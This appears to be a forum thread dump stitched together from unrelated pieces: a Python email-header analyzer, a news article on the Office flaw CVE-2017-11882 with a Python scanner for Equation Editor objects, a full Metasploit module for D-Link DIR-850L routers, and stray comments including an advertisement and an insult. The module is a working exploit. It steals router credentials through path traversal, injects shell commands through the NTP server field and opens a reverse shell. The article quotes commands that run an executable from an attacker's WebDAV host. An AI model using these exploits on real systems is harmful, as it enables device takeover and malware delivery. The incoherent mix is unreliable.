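An added example of the two analyses MHA advertises (hop delays and source of the email), written here in plain Python with the standard library; it is not MHA's own code. The sample message is constructed for the example with documentation-range addresses, and the parsing rules (Received headers are prepended by each MTA, the timestamp follows the last semicolon, the originating address is the bracketed IP of the oldest hop) are the conventions from RFC 5321 trace fields, applied loosely the way header analyzers do.

```python
import re
from email.parser import Parser
from email.utils import parsedate_to_datetime

# Constructed sample message: three Received hops as they appear in a delivered
# message (newest first). Hosts and addresses are documentation ranges, not real servers.
SAMPLE_MESSAGE = """\
Received: from mx2.example.net (mx2.example.net [203.0.113.20])
\tby mail.example.org with ESMTPS id k9si12;
\tFri, 24 Nov 2017 10:00:45 +0000
Received: from relay.example.com (relay.example.com [198.51.100.7])
\tby mx2.example.net with ESMTP;
\tFri, 24 Nov 2017 10:00:30 +0000
Received: from [192.0.2.15] (unknown [192.0.2.15])
\tby relay.example.com with SMTP;
\tFri, 24 Nov 2017 11:59:50 +0200
From: alice@example.com
To: bob@example.org
Subject: test

body
"""

IPV4 = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")


def parse_received(value):
    """Split one Received header into from-host, from-IP, by-host and timestamp.
    Folded whitespace is collapsed first; the date is whatever follows the last ';'."""
    v = " ".join(value.split())
    if ";" in v:
        head, date = v.rsplit(";", 1)
    else:
        head, date = v, ""
    m_from = re.match(r"from\s+(\S+)", head)
    m_by = re.search(r"\bby\s+(\S+)", head)
    m_ip = IPV4.search(head)
    try:
        when = parsedate_to_datetime(date.strip()) if date.strip() else None
    except (TypeError, ValueError):
        when = None
    return {
        "from_host": m_from.group(1) if m_from else None,
        "from_ip": m_ip.group(1) if m_ip else None,
        "by": m_by.group(1) if m_by else None,
        "time": when,
    }


def analyze_hops(raw_message):
    """Return hops in chronological order with the delay in seconds since the
    previous hop. Each MTA prepends its Received header, so the header order is
    reversed to get the path. A negative delay means clock skew between MTAs or
    a forged header, and is flagged as 'skew' rather than silently clamped."""
    msg = Parser().parsestr(raw_message)
    hops = [parse_received(v) for v in reversed(msg.get_all("Received", []))]
    prev = None
    for hop in hops:
        if prev is None or hop["time"] is None or prev["time"] is None:
            hop["delay"] = None
        else:
            hop["delay"] = int((hop["time"] - prev["time"]).total_seconds())
        hop["skew"] = hop["delay"] is not None and hop["delay"] < 0
        prev = hop
    return hops


def source_ip(raw_message):
    """The bracketed IP in the oldest Received hop: the usual best guess for
    where the message entered the mail system."""
    hops = analyze_hops(raw_message)
    return hops[0]["from_ip"] if hops else None


if __name__ == "__main__":
    for i, h in enumerate(analyze_hops(SAMPLE_MESSAGE), 1):
        print("hop %d: %s -> %s at %s delay=%s%s" % (
            i, h["from_host"], h["by"], h["time"], h["delay"], " SKEW" if h["skew"] else ""))
    print("source:", source_ip(SAMPLE_MESSAGE))
```

For the sample, the origin 192.0.2.15 handed the message to relay.example.com at 09:59:50 UTC (written as 11:59:50 +0200), the next hop took 40 seconds and the last 15. Only the oldest hop's IP is trusted as the source; anything a sender's own MTA wrote can be forged, which is why the delays and the skew flag matter when judging a header chain.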
26. You should be extra careful when opening files in MS Office.

When the world is still dealing with the threat of the 'unpatched' Microsoft Office built-in DDE feature, researchers have uncovered a serious issue with another Office component that could allow attackers to remotely install malware on targeted computers.

The vulnerability is a memory-corruption issue that resides in all versions of Microsoft Office released in the past 17 years, including Microsoft Office 365, and works against all versions of the Windows operating system, including the latest Microsoft Windows 10 Creators Update.

Discovered by the security researchers at Embedi, the vulnerability leads to remote code execution, allowing an unauthenticated, remote attacker to execute malicious code on a targeted system without requiring user interaction after opening a malicious document.

The vulnerability, identified as CVE-2017-11882, resides in EQNEDT32.EXE, an MS Office component which is responsible for insertion and editing of equations (OLE objects) in documents.

However, due to improper memory operations, the component fails to properly handle objects in memory, corrupting it in such a way that the attacker could execute malicious code in the context of the logged-in user.

Seventeen years ago, EQNEDT32.EXE was introduced in Microsoft Office 2000 and has been kept in all versions released after Microsoft Office 2007 in order to ensure the software remains compatible with documents of older versions.

DEMO: Exploitation Allows Full System Take Over

Exploitation of this vulnerability requires opening a specially crafted malicious file with an affected version of Microsoft Office or Microsoft WordPad software.

This vulnerability could be exploited to take complete control over a system when combined with Windows kernel privilege escalation exploits (like CVE-2017-11847).

Possible Attack Scenario:

While explaining the scope of the vulnerability, Embedi researchers suggested several attack scenarios, listed below:

"By inserting several OLEs that exploited the described vulnerability, it was possible to execute an arbitrary sequence of commands (e.g., to download an arbitrary file from the Internet and execute it)."

"One of the easiest ways to execute arbitrary code is to launch an executable file from the WebDAV server controlled by an attacker."

"Nonetheless, an attacker can use the described vulnerability to execute the commands like cmd.exe /c start \\attacker_ip\ff. Such a command can be used as a part of an exploit and triggers starting WebClient."

"After that, an attacker can start an executable file from the WebDAV server by using the \\attacker_ip\ff\1.exe command. The starting mechanism of an executable file is similar to that of the \\live.sysinternals.com\tools service."

Protection Against Microsoft Office Vulnerability

With this month's Patch release, Microsoft has addressed this vulnerability by changing how the affected software handles objects in memory.

So, users are strongly recommended to apply the November security patches as soon as possible to keep hackers and cybercriminals from taking control of their computers.

Since this component has a number of security issues which can be easily exploited, disabling it could be the best way to ensure your system's security.

Users can run the following command in the command prompt to disable registering of the component in the Windows registry:

    reg add "HKLM\SOFTWARE\Microsoft\Office\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400

For the 32-bit Microsoft Office package on an x64 OS, run the following command:

    reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400

Besides this, users should also enable Protected View (the Microsoft Office sandbox) to prevent active content execution (OLE/ActiveX/Macro).

Via thehackernews.com
    1 point
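An added triage example, not from the article or from Embedi: a Python scanner that looks inside an OOXML document (.docx/.xlsx/.pptx, which are zip files) for embedded Equation Editor objects, the component the article says to disable. It matches the Equation Editor CLSID from the `reg add` commands above in its binary GUID form, the "Equation Native" stream name that Equation Editor objects carry in their OLE container (stored UTF-16LE), and an `Equation.N` ProgID in the document XML. The sample document is constructed in memory and is not a real Word file; this is a heuristic that tells you a document carries an equation object, not that it is malicious.

```python
import io
import re
import zipfile

# CLSID of the Equation Editor COM class, as used in the reg add commands above.
EQNEDT_CLSID = "0002CE02-0000-0000-C000-000000000046"
# Stream name that Equation Editor objects carry inside their OLE compound file.
# Compound-file directory entries store names in UTF-16LE.
EQUATION_STREAM_UTF16 = "Equation Native".encode("utf-16-le")
# ProgID reference for an embedded Equation object in word/document.xml.
EQUATION_PROGID = re.compile(rb'ProgID="Equation\.\d+"')


def clsid_bytes(clsid):
    """Binary GUID form of a textual CLSID as stored in OLE files: the first
    three groups are little-endian, the last two are stored as written."""
    p = clsid.split("-")
    return (bytes.fromhex(p[0])[::-1] + bytes.fromhex(p[1])[::-1]
            + bytes.fromhex(p[2])[::-1] + bytes.fromhex(p[3]) + bytes.fromhex(p[4]))


def find_equation_objects(docx_bytes):
    """Return the zip members that look like Equation Editor OLE objects
    (*.bin carrying the stream name or the CLSID) or that reference
    Equation.N as a ProgID (*.xml). Works on any OOXML zip."""
    hits = []
    clsid = clsid_bytes(EQNEDT_CLSID)
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            data = z.read(name)
            if name.endswith(".bin") and (EQUATION_STREAM_UTF16 in data or clsid in data):
                hits.append(name)
            elif name.endswith(".xml") and EQUATION_PROGID.search(data):
                hits.append(name)
    return hits


def make_sample_docx(with_equation):
    """Constructed test input: a minimal OOXML-shaped zip, not a real Word file.
    The .bin member mimics an OLE container only as far as the magic and the
    stream name; enough to exercise the scanner offline."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        if with_equation:
            z.writestr("word/document.xml",
                       '<o:OLEObject Type="Embed" ProgID="Equation.3" r:id="rId5"/>')
            z.writestr("word/embeddings/oleObject1.bin",
                       b"\xd0\xcf\x11\xe0" + b"\x00" * 60 + EQUATION_STREAM_UTF16 + b"\x00" * 8)
        else:
            z.writestr("word/document.xml", "<w:document/>")
    return buf.getvalue()


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as f:
            print(find_equation_objects(f.read()))
    else:
        print("with equation:", find_equation_objects(make_sample_docx(True)))
        print("without:      ", find_equation_objects(make_sample_docx(False)))
```

Run it with a path to a document to list the members that reference Equation Editor; with no argument it runs against the two constructed samples. Pairing this with the registry kill bit above gives you both sides: the document check tells you which inbound files would have reached EQNEDT32.EXE, and the Compatibility Flags value 0x400 stops the class from being instantiated if one slips through.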
27. This Metasploit module leverages an unauthenticated credential disclosure vulnerability to execute arbitrary commands on DIR-850L routers as an authenticated user.

    ##
    # This module requires Metasploit: https://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##

    require 'openssl'

    class MetasploitModule < Msf::Exploit::Remote
      Rank = ExcellentRanking

      include Msf::Exploit::Remote::HttpClient
      include Msf::Auxiliary::Report
      include Msf::Exploit::CmdStager

      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'DIR-850L (Un)authenticated OS Command Exec',
          'Description'    => %q{
            This module leverages an unauthenticated credential disclosure
            vulnerability to then execute arbitrary commands on DIR-850L
            routers as an authenticated user. Unable to use Meterpreter
            payloads.
          },
          'Author'         => [
            'Mumbai', # https://github.com/realoriginal (module)
            'Zdenda'  # vuln discovery
          ],
          'References'     => [
            ['URL', 'https://www.seebug.org/vuldb/ssvid-96333'],
            ['URL', 'https://blogs.securiteam.com/index.php/archives/3310'],
          ],
          'DisclosureDate' => 'Aug 9 2017',
          'License'        => MSF_LICENSE,
          'Platform'       => 'linux',
          'Arch'           => ARCH_MIPSBE,
          'DefaultTarget'  => 0,
          'DefaultOptions' => {
            'PAYLOAD' => 'linux/mipsbe/shell/reverse_tcp'
          },
          'Privileged'     => true,
          'Payload'        => {
            'DisableNops' => true,
          },
          'Targets'        => [[ 'Automatic', {} ]],
        ))
      end

      def check
        begin
          res = send_request_cgi({
            'uri'    => '/',
            'method' => 'GET'
          })
          if res && res.headers['Server']
            auth = res.headers['Server']
            if auth =~ /DIR-850L/
              if auth =~ /WEBACCESS\/1\.0/
                return Exploit::CheckCode::Safe
              else
                return Exploit::CheckCode::Detected
              end
            end
          end
        rescue ::Rex::ConnectionError
          return Exploit::CheckCode::Unknown
        end
        Exploit::CheckCode::Unknown
      end

      def report_cred(opts)
        service_data = {
          address: opts[:ip],
          port: opts[:port],
          service_name: opts[:service_name],
          protocol: 'tcp',
          workspace_id: myworkspace_id
        }

        credential_data = {
          origin_type: :service,
          module_fullname: fullname,
          username: opts[:user],
          private_data: opts[:password],
          private_type: :password
        }.merge(service_data)

        login_data = {
          core: create_credential(credential_data),
          status: Metasploit::Model::Login::Status::UNTRIED,
          proof: opts[:proof]
        }.merge(service_data)

        create_credential_login(login_data)
      end

      # some other DIR-8X series routers are vulnerable to this same retrieve creds vuln as well...
      # should write an auxiliary module to-do -> WRITE AUXILIARY
      def retrieve_creds
        begin
          xml = "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n"
          xml << "<postxml>\r\n"
          xml << "<module>\r\n"
          xml << "    <service>../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml</service>\r\n"
          xml << "</module>\r\n"
          xml << "</postxml>"
          res = send_request_cgi({
            'uri'           => '/hedwig.cgi',
            'method'        => 'POST',
            'encode_params' => false,
            'headers'       => {
              'Accept-Encoding' => 'gzip, deflate',
              'Accept'          => '*/*'
            },
            'ctype'         => 'text/xml',
            'cookie'        => "uid=#{Rex::Text.rand_text_alpha_lower(8)}",
            'data'          => xml,
          })
          if res.body =~ /<password>(.*)<\/password>/ # fixes stack trace issue
            parse = res.get_xml_document
            username = parse.at('//name').text
            password = parse.at('//password').text
            vprint_good("#{peer} - Retrieved the username/password combo #{username}/#{password}")
            loot = store_loot("dlink.dir850l.login", "text/plain", rhost, res.body)
            print_good("#{peer} - Downloaded credentials to #{loot}")
            return username, password
          else
            fail_with(Failure::NotFound, "#{peer} - Credentials could not be obtained")
          end
        rescue ::Rex::ConnectionError
          fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.")
        end
      end

      def retrieve_uid
        begin
          res = send_request_cgi({
            'uri'    => '/authentication.cgi',
            'method' => 'GET',
          })
          parse = res.get_json_document
          uid = parse['uid']
          challenge = parse['challenge']
          return uid, challenge
        rescue ::Rex::ConnectionError
          fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.")
        end
      end

      def login(username, password)
        uid, challenge = retrieve_uid
        begin
          hash = OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('md5'), password.to_s, (username.to_s + challenge.to_s)).upcase
          send_request_cgi({
            'uri'    => '/authentication.cgi',
            'method' => 'POST',
            'data'   => "id=#{username}&password=#{hash}",
            'cookie' => "uid=#{uid}"
          })
          return uid
        rescue ::Rex::ConnectionError
          fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.")
        end
      end

      def execute_command(cmd, opts)
        uid = login(@username, @password) # reason being for loop is cause UID expires for some reason after executing 1 command
        payload = "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n"
        payload << "<postxml>\r\n"
        payload << "<module>\r\n"
        payload << "    <service>DEVICE.TIME</service>\r\n"
        payload << "    <device>\r\n"
        payload << "        <time>\r\n"
        payload << "            <ntp>\r\n"
        payload << "                <enable>1</enable>\r\n"
        payload << "                <period>604800</period>\r\n"
        payload << "                <server>#{Rex::Text.rand_text_alpha_lower(8)}; (#{cmd}&); </server>\r\n"
        payload << "            </ntp>\r\n"
        payload << "            <ntp6>\r\n"
        payload << "                <enable>1</enable>\r\n"
        payload << "                <period>604800</period>\r\n"
        payload << "            </ntp6>\r\n"
        payload << "            <timezone>20</timezone>\r\n"
        payload << "            <time/>\r\n"
        payload << "            <date/>\r\n"
        payload << "            <dst>0</dst>\r\n"
        payload << "            <dstmanual/>\r\n"
        payload << "            <dstoffset/>\r\n"
        payload << "        </time>\r\n"
        payload << "    </device>\r\n"
        payload << "</module>\r\n"
        payload << "</postxml>"
        begin
          # save configuration
          res = send_request_cgi({
            'uri'    => '/hedwig.cgi',
            'method' => 'POST',
            'ctype'  => 'text/xml',
            'data'   => payload,
            'cookie' => "uid=#{uid}"
          })
          # execute configuration
          res = send_request_cgi({
            'uri'    => '/pigwidgeon.cgi',
            'method' => 'POST',
            'data'   => 'ACTIONS=SETCFG,ACTIVATE',
            'cookie' => "uid=#{uid}"
          })
          return res
        rescue ::Rex::ConnectionError
          fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.")
        end
      end

      def exploit
        print_status("#{peer} - Connecting to target...")
        unless check == Exploit::CheckCode::Detected
          fail_with(Failure::Unknown, "#{peer} - Failed to access vulnerable url")
        end
        #
        # Information Retrieval, obtains creds and logs in
        #
        @username, @password = retrieve_creds
        execute_cmdstager(
          :flavor  => :wget,
          :linemax => 200
        )
      end
    end

Download dlink_dir850l_unauth_exec.rb.txt

Source
    1 point
28. My opinion: rather than wasting your time and energy making pocket change at your age, when you're still not on your own (I think), you'd better use your time to learn as much as possible, and later on your money will be assured. At your age it's more advisable to develop your mind; otherwise you risk ending up working for coffee money your whole life, maybe even for those who focused on learning instead of making money when they were young.
    1 point
29. Thanks, that was helpful. Anyway, this is mobotak.com, a company interested in tech and electronic gadgets. Our company buys, sells and repairs cell phones, tablets and computers and also sells their accessories; if you have any questions about this kind of stuff we'll be glad to help.
    -1 points
30. God forbid, you really aren't the sharpest. That's all you can do, man! Maxed your level!
    -1 points